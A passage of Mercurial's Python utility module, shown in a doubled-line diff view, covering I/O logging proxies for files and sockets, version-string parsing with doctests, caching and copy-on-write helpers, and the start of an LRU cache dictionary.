707 return object.__getattribute__(self, r'_observedcall')(
707 return object.__getattribute__(self, r'_observedcall')(
708 r'setblocking', *args, **kwargs)
708 r'setblocking', *args, **kwargs)
709
709
710 def settimeout(self, *args, **kwargs):
710 def settimeout(self, *args, **kwargs):
711 return object.__getattribute__(self, r'_observedcall')(
711 return object.__getattribute__(self, r'_observedcall')(
712 r'settimeout', *args, **kwargs)
712 r'settimeout', *args, **kwargs)
713
713
714 def gettimeout(self, *args, **kwargs):
714 def gettimeout(self, *args, **kwargs):
715 return object.__getattribute__(self, r'_observedcall')(
715 return object.__getattribute__(self, r'_observedcall')(
716 r'gettimeout', *args, **kwargs)
716 r'gettimeout', *args, **kwargs)
717
717
718 def setsockopt(self, *args, **kwargs):
718 def setsockopt(self, *args, **kwargs):
719 return object.__getattribute__(self, r'_observedcall')(
719 return object.__getattribute__(self, r'_observedcall')(
720 r'setsockopt', *args, **kwargs)
720 r'setsockopt', *args, **kwargs)
721
721
722 class baseproxyobserver(object):
722 class baseproxyobserver(object):
723 def _writedata(self, data):
723 def _writedata(self, data):
724 if not self.logdata:
724 if not self.logdata:
725 if self.logdataapis:
725 if self.logdataapis:
726 self.fh.write('\n')
726 self.fh.write('\n')
727 self.fh.flush()
727 self.fh.flush()
728 return
728 return
729
729
730 # Simple case writes all data on a single line.
730 # Simple case writes all data on a single line.
731 if b'\n' not in data:
731 if b'\n' not in data:
732 if self.logdataapis:
732 if self.logdataapis:
733 self.fh.write(': %s\n' % stringutil.escapestr(data))
733 self.fh.write(': %s\n' % stringutil.escapestr(data))
734 else:
734 else:
735 self.fh.write('%s> %s\n'
735 self.fh.write('%s> %s\n'
736 % (self.name, stringutil.escapestr(data)))
736 % (self.name, stringutil.escapestr(data)))
737 self.fh.flush()
737 self.fh.flush()
738 return
738 return
739
739
740 # Data with newlines is written to multiple lines.
740 # Data with newlines is written to multiple lines.
741 if self.logdataapis:
741 if self.logdataapis:
742 self.fh.write(':\n')
742 self.fh.write(':\n')
743
743
744 lines = data.splitlines(True)
744 lines = data.splitlines(True)
745 for line in lines:
745 for line in lines:
746 self.fh.write('%s> %s\n'
746 self.fh.write('%s> %s\n'
747 % (self.name, stringutil.escapestr(line)))
747 % (self.name, stringutil.escapestr(line)))
748 self.fh.flush()
748 self.fh.flush()
749
749
750 class fileobjectobserver(baseproxyobserver):
750 class fileobjectobserver(baseproxyobserver):
751 """Logs file object activity."""
751 """Logs file object activity."""
752 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
752 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
753 logdataapis=True):
753 logdataapis=True):
754 self.fh = fh
754 self.fh = fh
755 self.name = name
755 self.name = name
756 self.logdata = logdata
756 self.logdata = logdata
757 self.logdataapis = logdataapis
757 self.logdataapis = logdataapis
758 self.reads = reads
758 self.reads = reads
759 self.writes = writes
759 self.writes = writes
760
760
761 def read(self, res, size=-1):
761 def read(self, res, size=-1):
762 if not self.reads:
762 if not self.reads:
763 return
763 return
764 # Python 3 can return None from reads at EOF instead of empty strings.
764 # Python 3 can return None from reads at EOF instead of empty strings.
765 if res is None:
765 if res is None:
766 res = ''
766 res = ''
767
767
768 if size == -1 and res == '':
768 if size == -1 and res == '':
769 # Suppress pointless read(-1) calls that return
769 # Suppress pointless read(-1) calls that return
770 # nothing. These happen _a lot_ on Python 3, and there
770 # nothing. These happen _a lot_ on Python 3, and there
771 # doesn't seem to be a better workaround to have matching
771 # doesn't seem to be a better workaround to have matching
772 # Python 2 and 3 behavior. :(
772 # Python 2 and 3 behavior. :(
773 return
773 return
774
774
775 if self.logdataapis:
775 if self.logdataapis:
776 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
776 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
777
777
778 self._writedata(res)
778 self._writedata(res)
779
779
780 def readline(self, res, limit=-1):
780 def readline(self, res, limit=-1):
781 if not self.reads:
781 if not self.reads:
782 return
782 return
783
783
784 if self.logdataapis:
784 if self.logdataapis:
785 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
785 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
786
786
787 self._writedata(res)
787 self._writedata(res)
788
788
789 def readinto(self, res, dest):
789 def readinto(self, res, dest):
790 if not self.reads:
790 if not self.reads:
791 return
791 return
792
792
793 if self.logdataapis:
793 if self.logdataapis:
794 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
794 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
795 res))
795 res))
796
796
797 data = dest[0:res] if res is not None else b''
797 data = dest[0:res] if res is not None else b''
798
798
799 # _writedata() uses "in" operator and is confused by memoryview because
799 # _writedata() uses "in" operator and is confused by memoryview because
800 # characters are ints on Python 3.
800 # characters are ints on Python 3.
801 if isinstance(data, memoryview):
801 if isinstance(data, memoryview):
802 data = data.tobytes()
802 data = data.tobytes()
803
803
804 self._writedata(data)
804 self._writedata(data)
805
805
806 def write(self, res, data):
806 def write(self, res, data):
807 if not self.writes:
807 if not self.writes:
808 return
808 return
809
809
810 # Python 2 returns None from some write() calls. Python 3 (reasonably)
810 # Python 2 returns None from some write() calls. Python 3 (reasonably)
811 # returns the integer bytes written.
811 # returns the integer bytes written.
812 if res is None and data:
812 if res is None and data:
813 res = len(data)
813 res = len(data)
814
814
815 if self.logdataapis:
815 if self.logdataapis:
816 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
816 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
817
817
818 self._writedata(data)
818 self._writedata(data)
819
819
820 def flush(self, res):
820 def flush(self, res):
821 if not self.writes:
821 if not self.writes:
822 return
822 return
823
823
824 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
824 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
825
825
826 # For observedbufferedinputpipe.
826 # For observedbufferedinputpipe.
827 def bufferedread(self, res, size):
827 def bufferedread(self, res, size):
828 if not self.reads:
828 if not self.reads:
829 return
829 return
830
830
831 if self.logdataapis:
831 if self.logdataapis:
832 self.fh.write('%s> bufferedread(%d) -> %d' % (
832 self.fh.write('%s> bufferedread(%d) -> %d' % (
833 self.name, size, len(res)))
833 self.name, size, len(res)))
834
834
835 self._writedata(res)
835 self._writedata(res)
836
836
837 def bufferedreadline(self, res):
837 def bufferedreadline(self, res):
838 if not self.reads:
838 if not self.reads:
839 return
839 return
840
840
841 if self.logdataapis:
841 if self.logdataapis:
842 self.fh.write('%s> bufferedreadline() -> %d' % (
842 self.fh.write('%s> bufferedreadline() -> %d' % (
843 self.name, len(res)))
843 self.name, len(res)))
844
844
845 self._writedata(res)
845 self._writedata(res)
846
846
847 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
847 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
848 logdata=False, logdataapis=True):
848 logdata=False, logdataapis=True):
849 """Turn a file object into a logging file object."""
849 """Turn a file object into a logging file object."""
850
850
851 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
851 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
852 logdata=logdata, logdataapis=logdataapis)
852 logdata=logdata, logdataapis=logdataapis)
853 return fileobjectproxy(fh, observer)
853 return fileobjectproxy(fh, observer)
854
854
855 class socketobserver(baseproxyobserver):
855 class socketobserver(baseproxyobserver):
856 """Logs socket activity."""
856 """Logs socket activity."""
857 def __init__(self, fh, name, reads=True, writes=True, states=True,
857 def __init__(self, fh, name, reads=True, writes=True, states=True,
858 logdata=False, logdataapis=True):
858 logdata=False, logdataapis=True):
859 self.fh = fh
859 self.fh = fh
860 self.name = name
860 self.name = name
861 self.reads = reads
861 self.reads = reads
862 self.writes = writes
862 self.writes = writes
863 self.states = states
863 self.states = states
864 self.logdata = logdata
864 self.logdata = logdata
865 self.logdataapis = logdataapis
865 self.logdataapis = logdataapis
866
866
867 def makefile(self, res, mode=None, bufsize=None):
867 def makefile(self, res, mode=None, bufsize=None):
868 if not self.states:
868 if not self.states:
869 return
869 return
870
870
871 self.fh.write('%s> makefile(%r, %r)\n' % (
871 self.fh.write('%s> makefile(%r, %r)\n' % (
872 self.name, mode, bufsize))
872 self.name, mode, bufsize))
873
873
874 def recv(self, res, size, flags=0):
874 def recv(self, res, size, flags=0):
875 if not self.reads:
875 if not self.reads:
876 return
876 return
877
877
878 if self.logdataapis:
878 if self.logdataapis:
879 self.fh.write('%s> recv(%d, %d) -> %d' % (
879 self.fh.write('%s> recv(%d, %d) -> %d' % (
880 self.name, size, flags, len(res)))
880 self.name, size, flags, len(res)))
881 self._writedata(res)
881 self._writedata(res)
882
882
883 def recvfrom(self, res, size, flags=0):
883 def recvfrom(self, res, size, flags=0):
884 if not self.reads:
884 if not self.reads:
885 return
885 return
886
886
887 if self.logdataapis:
887 if self.logdataapis:
888 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
888 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
889 self.name, size, flags, len(res[0])))
889 self.name, size, flags, len(res[0])))
890
890
891 self._writedata(res[0])
891 self._writedata(res[0])
892
892
893 def recvfrom_into(self, res, buf, size, flags=0):
893 def recvfrom_into(self, res, buf, size, flags=0):
894 if not self.reads:
894 if not self.reads:
895 return
895 return
896
896
897 if self.logdataapis:
897 if self.logdataapis:
898 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
898 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
899 self.name, size, flags, res[0]))
899 self.name, size, flags, res[0]))
900
900
901 self._writedata(buf[0:res[0]])
901 self._writedata(buf[0:res[0]])
902
902
903 def recv_into(self, res, buf, size=0, flags=0):
903 def recv_into(self, res, buf, size=0, flags=0):
904 if not self.reads:
904 if not self.reads:
905 return
905 return
906
906
907 if self.logdataapis:
907 if self.logdataapis:
908 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
908 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
909 self.name, size, flags, res))
909 self.name, size, flags, res))
910
910
911 self._writedata(buf[0:res])
911 self._writedata(buf[0:res])
912
912
913 def send(self, res, data, flags=0):
913 def send(self, res, data, flags=0):
914 if not self.writes:
914 if not self.writes:
915 return
915 return
916
916
917 self.fh.write('%s> send(%d, %d) -> %d' % (
917 self.fh.write('%s> send(%d, %d) -> %d' % (
918 self.name, len(data), flags, len(res)))
918 self.name, len(data), flags, len(res)))
919 self._writedata(data)
919 self._writedata(data)
920
920
921 def sendall(self, res, data, flags=0):
921 def sendall(self, res, data, flags=0):
922 if not self.writes:
922 if not self.writes:
923 return
923 return
924
924
925 if self.logdataapis:
925 if self.logdataapis:
926 # Returns None on success. So don't bother reporting return value.
926 # Returns None on success. So don't bother reporting return value.
927 self.fh.write('%s> sendall(%d, %d)' % (
927 self.fh.write('%s> sendall(%d, %d)' % (
928 self.name, len(data), flags))
928 self.name, len(data), flags))
929
929
930 self._writedata(data)
930 self._writedata(data)
931
931
932 def sendto(self, res, data, flagsoraddress, address=None):
932 def sendto(self, res, data, flagsoraddress, address=None):
933 if not self.writes:
933 if not self.writes:
934 return
934 return
935
935
936 if address:
936 if address:
937 flags = flagsoraddress
937 flags = flagsoraddress
938 else:
938 else:
939 flags = 0
939 flags = 0
940
940
941 if self.logdataapis:
941 if self.logdataapis:
942 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
942 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
943 self.name, len(data), flags, address, res))
943 self.name, len(data), flags, address, res))
944
944
945 self._writedata(data)
945 self._writedata(data)
946
946
947 def setblocking(self, res, flag):
947 def setblocking(self, res, flag):
948 if not self.states:
948 if not self.states:
949 return
949 return
950
950
951 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
951 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
952
952
953 def settimeout(self, res, value):
953 def settimeout(self, res, value):
954 if not self.states:
954 if not self.states:
955 return
955 return
956
956
957 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
957 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
958
958
959 def gettimeout(self, res):
959 def gettimeout(self, res):
960 if not self.states:
960 if not self.states:
961 return
961 return
962
962
963 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
963 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
964
964
965 def setsockopt(self, res, level, optname, value):
965 def setsockopt(self, res, level, optname, value):
966 if not self.states:
966 if not self.states:
967 return
967 return
968
968
969 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
969 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
970 self.name, level, optname, value, res))
970 self.name, level, optname, value, res))
971
971
972 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
972 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
973 logdata=False, logdataapis=True):
973 logdata=False, logdataapis=True):
974 """Turn a socket into a logging socket."""
974 """Turn a socket into a logging socket."""
975
975
976 observer = socketobserver(logh, name, reads=reads, writes=writes,
976 observer = socketobserver(logh, name, reads=reads, writes=writes,
977 states=states, logdata=logdata,
977 states=states, logdata=logdata,
978 logdataapis=logdataapis)
978 logdataapis=logdataapis)
979 return socketproxy(fh, observer)
979 return socketproxy(fh, observer)
980
980
981 def version():
981 def version():
982 """Return version information if available."""
982 """Return version information if available."""
983 try:
983 try:
984 from . import __version__
984 from . import __version__
985 return __version__.version
985 return __version__.version
986 except ImportError:
986 except ImportError:
987 return 'unknown'
987 return 'unknown'
988
988
989 def versiontuple(v=None, n=4):
989 def versiontuple(v=None, n=4):
990 """Parses a Mercurial version string into an N-tuple.
990 """Parses a Mercurial version string into an N-tuple.
991
991
992 The version string to be parsed is specified with the ``v`` argument.
992 The version string to be parsed is specified with the ``v`` argument.
993 If it isn't defined, the current Mercurial version string will be parsed.
993 If it isn't defined, the current Mercurial version string will be parsed.
994
994
995 ``n`` can be 2, 3, or 4. Here is how some version strings map to
995 ``n`` can be 2, 3, or 4. Here is how some version strings map to
996 returned values:
996 returned values:
997
997
998 >>> v = b'3.6.1+190-df9b73d2d444'
998 >>> v = b'3.6.1+190-df9b73d2d444'
999 >>> versiontuple(v, 2)
999 >>> versiontuple(v, 2)
1000 (3, 6)
1000 (3, 6)
1001 >>> versiontuple(v, 3)
1001 >>> versiontuple(v, 3)
1002 (3, 6, 1)
1002 (3, 6, 1)
1003 >>> versiontuple(v, 4)
1003 >>> versiontuple(v, 4)
1004 (3, 6, 1, '190-df9b73d2d444')
1004 (3, 6, 1, '190-df9b73d2d444')
1005
1005
1006 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1006 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1007 (3, 6, 1, '190-df9b73d2d444+20151118')
1007 (3, 6, 1, '190-df9b73d2d444+20151118')
1008
1008
1009 >>> v = b'3.6'
1009 >>> v = b'3.6'
1010 >>> versiontuple(v, 2)
1010 >>> versiontuple(v, 2)
1011 (3, 6)
1011 (3, 6)
1012 >>> versiontuple(v, 3)
1012 >>> versiontuple(v, 3)
1013 (3, 6, None)
1013 (3, 6, None)
1014 >>> versiontuple(v, 4)
1014 >>> versiontuple(v, 4)
1015 (3, 6, None, None)
1015 (3, 6, None, None)
1016
1016
1017 >>> v = b'3.9-rc'
1017 >>> v = b'3.9-rc'
1018 >>> versiontuple(v, 2)
1018 >>> versiontuple(v, 2)
1019 (3, 9)
1019 (3, 9)
1020 >>> versiontuple(v, 3)
1020 >>> versiontuple(v, 3)
1021 (3, 9, None)
1021 (3, 9, None)
1022 >>> versiontuple(v, 4)
1022 >>> versiontuple(v, 4)
1023 (3, 9, None, 'rc')
1023 (3, 9, None, 'rc')
1024
1024
1025 >>> v = b'3.9-rc+2-02a8fea4289b'
1025 >>> v = b'3.9-rc+2-02a8fea4289b'
1026 >>> versiontuple(v, 2)
1026 >>> versiontuple(v, 2)
1027 (3, 9)
1027 (3, 9)
1028 >>> versiontuple(v, 3)
1028 >>> versiontuple(v, 3)
1029 (3, 9, None)
1029 (3, 9, None)
1030 >>> versiontuple(v, 4)
1030 >>> versiontuple(v, 4)
1031 (3, 9, None, 'rc+2-02a8fea4289b')
1031 (3, 9, None, 'rc+2-02a8fea4289b')
1032
1032
1033 >>> versiontuple(b'4.6rc0')
1033 >>> versiontuple(b'4.6rc0')
1034 (4, 6, None, 'rc0')
1034 (4, 6, None, 'rc0')
1035 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1035 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1036 (4, 6, None, 'rc0+12-425d55e54f98')
1036 (4, 6, None, 'rc0+12-425d55e54f98')
1037 >>> versiontuple(b'.1.2.3')
1037 >>> versiontuple(b'.1.2.3')
1038 (None, None, None, '.1.2.3')
1038 (None, None, None, '.1.2.3')
1039 >>> versiontuple(b'12.34..5')
1039 >>> versiontuple(b'12.34..5')
1040 (12, 34, None, '..5')
1040 (12, 34, None, '..5')
1041 >>> versiontuple(b'1.2.3.4.5.6')
1041 >>> versiontuple(b'1.2.3.4.5.6')
1042 (1, 2, 3, '.4.5.6')
1042 (1, 2, 3, '.4.5.6')
1043 """
1043 """
1044 if not v:
1044 if not v:
1045 v = version()
1045 v = version()
1046 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1046 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1047 if not m:
1047 if not m:
1048 vparts, extra = '', v
1048 vparts, extra = '', v
1049 elif m.group(2):
1049 elif m.group(2):
1050 vparts, extra = m.groups()
1050 vparts, extra = m.groups()
1051 else:
1051 else:
1052 vparts, extra = m.group(1), None
1052 vparts, extra = m.group(1), None
1053
1053
1054 vints = []
1054 vints = []
1055 for i in vparts.split('.'):
1055 for i in vparts.split('.'):
1056 try:
1056 try:
1057 vints.append(int(i))
1057 vints.append(int(i))
1058 except ValueError:
1058 except ValueError:
1059 break
1059 break
1060 # (3, 6) -> (3, 6, None)
1060 # (3, 6) -> (3, 6, None)
1061 while len(vints) < 3:
1061 while len(vints) < 3:
1062 vints.append(None)
1062 vints.append(None)
1063
1063
1064 if n == 2:
1064 if n == 2:
1065 return (vints[0], vints[1])
1065 return (vints[0], vints[1])
1066 if n == 3:
1066 if n == 3:
1067 return (vints[0], vints[1], vints[2])
1067 return (vints[0], vints[1], vints[2])
1068 if n == 4:
1068 if n == 4:
1069 return (vints[0], vints[1], vints[2], extra)
1069 return (vints[0], vints[1], vints[2], extra)
1070
1070
1071 def cachefunc(func):
1071 def cachefunc(func):
1072 '''cache the result of function calls'''
1072 '''cache the result of function calls'''
1073 # XXX doesn't handle keywords args
1073 # XXX doesn't handle keywords args
1074 if func.__code__.co_argcount == 0:
1074 if func.__code__.co_argcount == 0:
1075 cache = []
1075 cache = []
1076 def f():
1076 def f():
1077 if len(cache) == 0:
1077 if len(cache) == 0:
1078 cache.append(func())
1078 cache.append(func())
1079 return cache[0]
1079 return cache[0]
1080 return f
1080 return f
1081 cache = {}
1081 cache = {}
1082 if func.__code__.co_argcount == 1:
1082 if func.__code__.co_argcount == 1:
1083 # we gain a small amount of time because
1083 # we gain a small amount of time because
1084 # we don't need to pack/unpack the list
1084 # we don't need to pack/unpack the list
1085 def f(arg):
1085 def f(arg):
1086 if arg not in cache:
1086 if arg not in cache:
1087 cache[arg] = func(arg)
1087 cache[arg] = func(arg)
1088 return cache[arg]
1088 return cache[arg]
1089 else:
1089 else:
1090 def f(*args):
1090 def f(*args):
1091 if args not in cache:
1091 if args not in cache:
1092 cache[args] = func(*args)
1092 cache[args] = func(*args)
1093 return cache[args]
1093 return cache[args]
1094
1094
1095 return f
1095 return f
1096
1096
1097 class cow(object):
1097 class cow(object):
1098 """helper class to make copy-on-write easier
1098 """helper class to make copy-on-write easier
1099
1099
1100 Call preparewrite before doing any writes.
1100 Call preparewrite before doing any writes.
1101 """
1101 """
1102
1102
1103 def preparewrite(self):
1103 def preparewrite(self):
1104 """call this before writes, return self or a copied new object"""
1104 """call this before writes, return self or a copied new object"""
1105 if getattr(self, '_copied', 0):
1105 if getattr(self, '_copied', 0):
1106 self._copied -= 1
1106 self._copied -= 1
1107 return self.__class__(self)
1107 return self.__class__(self)
1108 return self
1108 return self
1109
1109
1110 def copy(self):
1110 def copy(self):
1111 """always do a cheap copy"""
1111 """always do a cheap copy"""
1112 self._copied = getattr(self, '_copied', 0) + 1
1112 self._copied = getattr(self, '_copied', 0) + 1
1113 return self
1113 return self
1114
1114
1115 class sortdict(collections.OrderedDict):
1115 class sortdict(collections.OrderedDict):
1116 '''a simple sorted dictionary
1116 '''a simple sorted dictionary
1117
1117
1118 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1118 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1119 >>> d2 = d1.copy()
1119 >>> d2 = d1.copy()
1120 >>> d2
1120 >>> d2
1121 sortdict([('a', 0), ('b', 1)])
1121 sortdict([('a', 0), ('b', 1)])
1122 >>> d2.update([(b'a', 2)])
1122 >>> d2.update([(b'a', 2)])
1123 >>> list(d2.keys()) # should still be in last-set order
1123 >>> list(d2.keys()) # should still be in last-set order
1124 ['b', 'a']
1124 ['b', 'a']
1125 '''
1125 '''
1126
1126
1127 def __setitem__(self, key, value):
1127 def __setitem__(self, key, value):
1128 if key in self:
1128 if key in self:
1129 del self[key]
1129 del self[key]
1130 super(sortdict, self).__setitem__(key, value)
1130 super(sortdict, self).__setitem__(key, value)
1131
1131
1132 if pycompat.ispypy:
1132 if pycompat.ispypy:
1133 # __setitem__() isn't called as of PyPy 5.8.0
1133 # __setitem__() isn't called as of PyPy 5.8.0
1134 def update(self, src):
1134 def update(self, src):
1135 if isinstance(src, dict):
1135 if isinstance(src, dict):
1136 src = src.iteritems()
1136 src = src.iteritems()
1137 for k, v in src:
1137 for k, v in src:
1138 self[k] = v
1138 self[k] = v
1139
1139
1140 class cowdict(cow, dict):
1140 class cowdict(cow, dict):
1141 """copy-on-write dict
1141 """copy-on-write dict
1142
1142
1143 Be sure to call d = d.preparewrite() before writing to d.
1143 Be sure to call d = d.preparewrite() before writing to d.
1144
1144
1145 >>> a = cowdict()
1145 >>> a = cowdict()
1146 >>> a is a.preparewrite()
1146 >>> a is a.preparewrite()
1147 True
1147 True
1148 >>> b = a.copy()
1148 >>> b = a.copy()
1149 >>> b is a
1149 >>> b is a
1150 True
1150 True
1151 >>> c = b.copy()
1151 >>> c = b.copy()
1152 >>> c is a
1152 >>> c is a
1153 True
1153 True
1154 >>> a = a.preparewrite()
1154 >>> a = a.preparewrite()
1155 >>> b is a
1155 >>> b is a
1156 False
1156 False
1157 >>> a is a.preparewrite()
1157 >>> a is a.preparewrite()
1158 True
1158 True
1159 >>> c = c.preparewrite()
1159 >>> c = c.preparewrite()
1160 >>> b is c
1160 >>> b is c
1161 False
1161 False
1162 >>> b is b.preparewrite()
1162 >>> b is b.preparewrite()
1163 True
1163 True
1164 """
1164 """
1165
1165
1166 class cowsortdict(cow, sortdict):
1166 class cowsortdict(cow, sortdict):
1167 """copy-on-write sortdict
1167 """copy-on-write sortdict
1168
1168
1169 Be sure to call d = d.preparewrite() before writing to d.
1169 Be sure to call d = d.preparewrite() before writing to d.
1170 """
1170 """
1171
1171
1172 class transactional(object):
1172 class transactional(object):
1173 """Base class for making a transactional type into a context manager."""
1173 """Base class for making a transactional type into a context manager."""
1174 __metaclass__ = abc.ABCMeta
1174 __metaclass__ = abc.ABCMeta
1175
1175
1176 @abc.abstractmethod
1176 @abc.abstractmethod
1177 def close(self):
1177 def close(self):
1178 """Successfully closes the transaction."""
1178 """Successfully closes the transaction."""
1179
1179
1180 @abc.abstractmethod
1180 @abc.abstractmethod
1181 def release(self):
1181 def release(self):
1182 """Marks the end of the transaction.
1182 """Marks the end of the transaction.
1183
1183
1184 If the transaction has not been closed, it will be aborted.
1184 If the transaction has not been closed, it will be aborted.
1185 """
1185 """
1186
1186
1187 def __enter__(self):
1187 def __enter__(self):
1188 return self
1188 return self
1189
1189
1190 def __exit__(self, exc_type, exc_val, exc_tb):
1190 def __exit__(self, exc_type, exc_val, exc_tb):
1191 try:
1191 try:
1192 if exc_type is None:
1192 if exc_type is None:
1193 self.close()
1193 self.close()
1194 finally:
1194 finally:
1195 self.release()
1195 self.release()
1196
1196
1197 @contextlib.contextmanager
1197 @contextlib.contextmanager
1198 def acceptintervention(tr=None):
1198 def acceptintervention(tr=None):
1199 """A context manager that closes the transaction on InterventionRequired
1199 """A context manager that closes the transaction on InterventionRequired
1200
1200
1201 If no transaction was provided, this simply runs the body and returns
1201 If no transaction was provided, this simply runs the body and returns
1202 """
1202 """
1203 if not tr:
1203 if not tr:
1204 yield
1204 yield
1205 return
1205 return
1206 try:
1206 try:
1207 yield
1207 yield
1208 tr.close()
1208 tr.close()
1209 except error.InterventionRequired:
1209 except error.InterventionRequired:
1210 tr.close()
1210 tr.close()
1211 raise
1211 raise
1212 finally:
1212 finally:
1213 tr.release()
1213 tr.release()
1214
1214
1215 @contextlib.contextmanager
1215 @contextlib.contextmanager
1216 def nullcontextmanager():
1216 def nullcontextmanager():
1217 yield
1217 yield
1218
1218
1219 class _lrucachenode(object):
1219 class _lrucachenode(object):
1220 """A node in a doubly linked list.
1220 """A node in a doubly linked list.
1221
1221
1222 Holds a reference to nodes on either side as well as a key-value
1222 Holds a reference to nodes on either side as well as a key-value
1223 pair for the dictionary entry.
1223 pair for the dictionary entry.
1224 """
1224 """
1225 __slots__ = (r'next', r'prev', r'key', r'value', r'cost')
1225 __slots__ = (r'next', r'prev', r'key', r'value', r'cost')
1226
1226
1227 def __init__(self):
1227 def __init__(self):
1228 self.next = None
1228 self.next = None
1229 self.prev = None
1229 self.prev = None
1230
1230
1231 self.key = _notset
1231 self.key = _notset
1232 self.value = None
1232 self.value = None
1233 self.cost = 0
1233 self.cost = 0
1234
1234
1235 def markempty(self):
1235 def markempty(self):
1236 """Mark the node as emptied."""
1236 """Mark the node as emptied."""
1237 self.key = _notset
1237 self.key = _notset
1238 self.value = None
1238 self.value = None
1239 self.cost = 0
1239 self.cost = 0
1240
1240
1241 class lrucachedict(object):
1241 class lrucachedict(object):
1242 """Dict that caches most recent accesses and sets.
1242 """Dict that caches most recent accesses and sets.
1243
1243
1244 The dict consists of an actual backing dict - indexed by original
1244 The dict consists of an actual backing dict - indexed by original
1245 key - and a doubly linked circular list defining the order of entries in
1245 key - and a doubly linked circular list defining the order of entries in
1246 the cache.
1246 the cache.
1247
1247
1248 The head node is the newest entry in the cache. If the cache is full,
1248 The head node is the newest entry in the cache. If the cache is full,
1249 we recycle head.prev and make it the new head. Cache accesses result in
1249 we recycle head.prev and make it the new head. Cache accesses result in
1250 the node being moved to before the existing head and being marked as the
1250 the node being moved to before the existing head and being marked as the
1251 new head node.
1251 new head node.
1252
1252
1253 Items in the cache can be inserted with an optional "cost" value. This is
1253 Items in the cache can be inserted with an optional "cost" value. This is
1254 simply an integer that is specified by the caller. The cache can be queried
1254 simply an integer that is specified by the caller. The cache can be queried
1255 for the total cost of all items presently in the cache.
1255 for the total cost of all items presently in the cache.
1256
1256
1257 The cache can also define a maximum cost. If a cache insertion would
1257 The cache can also define a maximum cost. If a cache insertion would
1258 cause the total cost of the cache to go beyond the maximum cost limit,
1258 cause the total cost of the cache to go beyond the maximum cost limit,
1259 nodes will be evicted to make room for the new code. This can be used
1259 nodes will be evicted to make room for the new code. This can be used
1260 to e.g. set a max memory limit and associate an estimated bytes size
1260 to e.g. set a max memory limit and associate an estimated bytes size
1261 cost to each item in the cache. By default, no maximum cost is enforced.
1261 cost to each item in the cache. By default, no maximum cost is enforced.
1262 """
1262 """
1263 def __init__(self, max, maxcost=0):
1263 def __init__(self, max, maxcost=0):
1264 self._cache = {}
1264 self._cache = {}
1265
1265
1266 self._head = head = _lrucachenode()
1266 self._head = head = _lrucachenode()
1267 head.prev = head
1267 head.prev = head
1268 head.next = head
1268 head.next = head
1269 self._size = 1
1269 self._size = 1
1270 self.capacity = max
1270 self.capacity = max
1271 self.totalcost = 0
1271 self.totalcost = 0
1272 self.maxcost = maxcost
1272 self.maxcost = maxcost
1273
1273
1274 def __len__(self):
1274 def __len__(self):
1275 return len(self._cache)
1275 return len(self._cache)
1276
1276
1277 def __contains__(self, k):
1277 def __contains__(self, k):
1278 return k in self._cache
1278 return k in self._cache
1279
1279
1280 def __iter__(self):
1280 def __iter__(self):
1281 # We don't have to iterate in cache order, but why not.
1281 # We don't have to iterate in cache order, but why not.
1282 n = self._head
1282 n = self._head
1283 for i in range(len(self._cache)):
1283 for i in range(len(self._cache)):
1284 yield n.key
1284 yield n.key
1285 n = n.next
1285 n = n.next
1286
1286
1287 def __getitem__(self, k):
1287 def __getitem__(self, k):
1288 node = self._cache[k]
1288 node = self._cache[k]
1289 self._movetohead(node)
1289 self._movetohead(node)
1290 return node.value
1290 return node.value
1291
1291
1292 def insert(self, k, v, cost=0):
1292 def insert(self, k, v, cost=0):
1293 """Insert a new item in the cache with optional cost value."""
1293 """Insert a new item in the cache with optional cost value."""
1294 node = self._cache.get(k)
1294 node = self._cache.get(k)
1295 # Replace existing value and mark as newest.
1295 # Replace existing value and mark as newest.
1296 if node is not None:
1296 if node is not None:
1297 self.totalcost -= node.cost
1297 self.totalcost -= node.cost
1298 node.value = v
1298 node.value = v
1299 node.cost = cost
1299 node.cost = cost
1300 self.totalcost += cost
1300 self.totalcost += cost
1301 self._movetohead(node)
1301 self._movetohead(node)
1302
1302
1303 if self.maxcost:
1303 if self.maxcost:
1304 self._enforcecostlimit()
1304 self._enforcecostlimit()
1305
1305
1306 return
1306 return
1307
1307
1308 if self._size < self.capacity:
1308 if self._size < self.capacity:
1309 node = self._addcapacity()
